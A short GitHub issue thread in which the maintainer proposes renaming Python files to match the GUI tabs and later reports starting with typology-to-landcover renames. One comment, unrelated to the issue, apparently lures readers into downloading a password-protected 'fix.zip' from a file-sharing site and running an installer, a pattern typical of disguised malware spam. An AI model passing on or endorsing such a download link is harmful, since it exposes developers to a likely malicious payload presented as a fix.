### ISSUE TITLE
Change name on files to match tabs in GUI

### ISSUE THREAD

**Issue by biglimp** [gusbacos/suews_database_manager#2]
Since we made changes in the tabs and added types again, we should change the python filenames

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by biglimp** [comment]
Started with changing typology to landcover. There are multiple places where changes are made. Beware...
